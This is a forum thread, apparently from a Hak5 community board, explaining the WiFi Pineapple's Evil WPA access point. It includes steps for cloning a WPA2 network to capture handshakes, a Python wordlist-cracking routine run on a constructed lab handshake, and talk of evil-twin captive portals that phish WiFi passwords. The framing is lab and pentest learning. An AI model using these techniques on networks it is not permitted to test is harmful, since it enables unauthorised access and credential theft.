Evil WPA Access Point...


olympus_mons

Hi all,

I am getting very confused with terminology.

When I click PineAP > Access Points, I see three options, they are as follows...

- Management Access Point

- Open Access Point

- Evil WPA Access Point

I have kind of got the Evil Portal module working but I am wondering what the Evil WPA Access Point is for.

The Open Access Point is used with the Evil Portal module but what is the Evil WPA Access Point used for?

Also, what is the purpose of the Management Access Point? I thought this was for managing the Pineapple but I notice management can be done via the Open Access Point.

I am really struggling and the book that came with the Pineapple really does not help.

Thanks in advance,

The Evil WPA AP is used to try to capture handshakes from STA/clients that are making connect attempts to that AP/ESSID. You won't get the psk/password for the true AP, but you might be able to obtain handshakes that can be used later on to try to crack it and get the plain text psk for that network.

One way of "demoing" it:

- Set up an AP using (for example) WPA2-PSK CCMP
- Connect a STA/client to that AP (only set up this specific AP on that device just to make the test/demo a bit easier)
- Do a recon scan using the Pineapple (if you don't want to add the information needed to the Evil AP manually)
- Click on the AP in the recon scan results
- Click "Clone WPA/2 AP" (disable the Evil AP at this point)
- Shutdown the "true" AP
- Enable the Evil AP on the Pineapple (that now should be set up to emulate the "true" AP)
- Try to connect to the Evil AP using the same device that previously was connected to the "true" AP
- See if any handshakes are captured on the Pineapple
- Download the capture files to some PC with Hashcat and/or aircrack-ng (running Kali Linux for example)
- Since you know the psk for this test/demo setup, try to crack it using hashcat (or aircrack-ng) and a wordlist containing the psk in order to verify that the captured handshake is valid

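The verification step at the end of the demo above (crack the capture with a wordlist that contains the known PSK) and the later point in this thread that a captured handshake cannot be replayed both rest on the same derivation. The block below is an added example, not code from this thread or from the Pineapple firmware: it re-implements the WPA2-PSK check that hashcat and aircrack-ng perform (passphrase to PMK to PTK to EAPOL MIC) and runs it over a constructed lab handshake whose SSID, MACs, nonces and passphrase are assumed values.

```python
import hashlib
import hmac

MIC_OFF = 81  # offset of the 16-byte MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); this is the
    # slow step a wordlist check repeats for every candidate.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce) -> bytes:
    # PRF-384 (IEEE 802.11): the PTK is bound to both MACs and both nonces, which
    # is why a captured handshake cannot simply be replayed against another AP.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(3)]
    return b"".join(blocks)[:48]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): HMAC-SHA1-128 over the frame, MIC zeroed
    zeroed = eapol[:MIC_OFF] + bytes(16) + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate, ssid, aa, spa, anonce, snonce, eapol_msg2) -> bool:
    """True iff `candidate` reproduces the MIC the client put in handshake message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2), eapol_msg2[MIC_OFF:MIC_OFF + 16])


def first_match(wordlist, ssid, aa, spa, anonce, snonce, eapol_msg2):
    """Return the first wordlist entry that validates the handshake, else None."""
    return next((w for w in wordlist
                 if passphrase_matches(w, ssid, aa, spa, anonce, snonce, eapol_msg2)), None)


# --- constructed lab handshake (assumed values, not a real capture) ---
SSID, PSK = "LabNet", "correct horse battery"
AA = bytes.fromhex("001122334455")    # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")   # client (supplicant) MAC
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
# EAPOL-Key message 2: EAPOL v2, type 3, body 95 bytes; RSN descriptor, key info
# 0x010a, key length 0, replay counter 1, SNonce, zero IV/RSC/ID, MIC, no key data.
_frame = (bytes.fromhex("0203005f02010a0000") + (1).to_bytes(8, "big") + SNONCE
          + bytes(32) + bytes(16) + bytes(2))
_kck = ptk_from_pmk(pmk_from_passphrase(PSK, SSID), AA, SPA, ANONCE, SNONCE)[:16]
EAPOL_MSG2 = _frame[:MIC_OFF] + eapol_mic(_kck, _frame) + _frame[MIC_OFF + 16:]

if __name__ == "__main__":
    print(first_match(["password", "letmein", PSK], SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2))
```

With a real capture you would take the MACs, both nonces and the raw EAPOL message 2 from the pcap instead of the constructed values; the MIC comparison is the same.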
Many thanks for this, I will give this a go 👍

Sure I saw a video somewhere that showed the pineapple catching the encrypted WPA key and then comparing that captured WPA key to the WPA key manually entered into a captive portal by the user, then if the encrypted WPA keys matched, the user would be redirected back to the actual AP. Or am I talking rubbish?

Not sure what you refer to when saying "WPA key". If you mean the handshake, it should not be possible to reuse/replay. You need to get hold of the actual psk. But if you can do that in some way, then it's possible to verify if anything obtained from social engineered users is the actual passphrase.

Regarding the management AP, this should be possible to control more in detail with the upcoming 2.0.0 firmware. It's still in beta and the feature to control access to the management interface is experimental.

12 hours ago, olympus_mons said:

Many thanks for this, I will give this a go 👍

Sure I saw a video somewhere that showed the pineapple catching the encrypted WPA key and then comparing that captured WPA key to the WPA key manually entered into a captive portal by the user, then if the encrypted WPA keys matched, the user would be redirected back to the actual AP. Or am I talking rubbish?

I recently did a video on the Enterprise option in case you're interested. I was waiting for a better Beta to do a video on Evil WPA in combination with the Evil Portal. This video will be uploaded within a week.

2 weeks later...
On 3/31/2022 at 10:35 PM, dark_pyrro said:

Not sure what you refer to when saying "WPA key". If you mean the handshake, it should not be possible to reuse/replay. You need to get hold of the actual psk. But if you can do that in some way, then it's possible to verify if anything obtained from social engineered users is the actual passphrase.

Regarding the management AP, this should be possible to control more in detail with the upcoming 2.0.0 firmware. It's still in beta and the feature to control access to the management interface is experimental.

Apologies for the delayed response and for the poor use of terminology. When I say WPA key I mean the pre-shared key users use to connect to the AP.

I am sure I watched a video showing the Pineapple blocking access to the legitimate AP until the user entered the proper / actual pre-shared key. The way in which the Pineapple knew the pre-shared key being entered was the proper / actual pre-shared key was by comparing the pre-shared key captured in the handshake with the pre-shared key entered by the user. The Pineapple compared the two encrypted values, meaning the captured pre-shared key still needed to be cracked with aircrack or hashcat etc.

Does this sound familiar?

I think airgeddon can do this; it's an Evil Twin AP as opposed to an Evil Portal. I am just not sure how useful an Evil Portal will be during a pentest, however, I feel an Evil AP / Rogue AP will be very useful...

Every tool has its purpose. In any way, you have to refer to that video to be able to see it all in its context and get the full picture of the methodology used. I have seen a lot of videos over the years about the Pineapple, but can't recall anything that is similar to what you are describing. That doesn't mean it's not out there though, I may have missed watching some or just don't remember. The only thing that vaguely rings a bell is that Kody did some video (Null Byte), but that didn't involve a Pineapple as I remember it off the top of my head.

2 hours ago, dark_pyrro said:

Every tool has its purpose. In any way, you have to refer to that video to be able to see it all in its context and get the full picture of the methodology used. I have seen a lot of videos over the years about the Pineapple, but can't recall anything that is similar to what you are describing. That doesn't mean it's not out there though, I may have missed watching some or just don't remember. The only thing that vaguely rings a bell is that Kody did some video (Null Byte), but that didn't involve a Pineapple as I remember it off the top of my head.

Which video are you referring to, please? I do not have the Enterprise Pineapple, I just have the normal Mark 7; will the content of the video still apply?

No one else, except Hak5, has access to the Pineapple Enterprise since it's not released to market yet.

I haven't got any link to a specific video. I just seem to remember that I've seen something that is similar to what you describe, although it's not exactly the same since what you are trying to describe shouldn't work without additional actions.

1 year later...

The link to the video you're looking for is here… At around mark 53:18 is where Kody is describing that evil twin attack with captive portal requiring the target to enter the correct WiFi password before they can proceed. Now my question is, is this possible with the WiFi Pineapple?
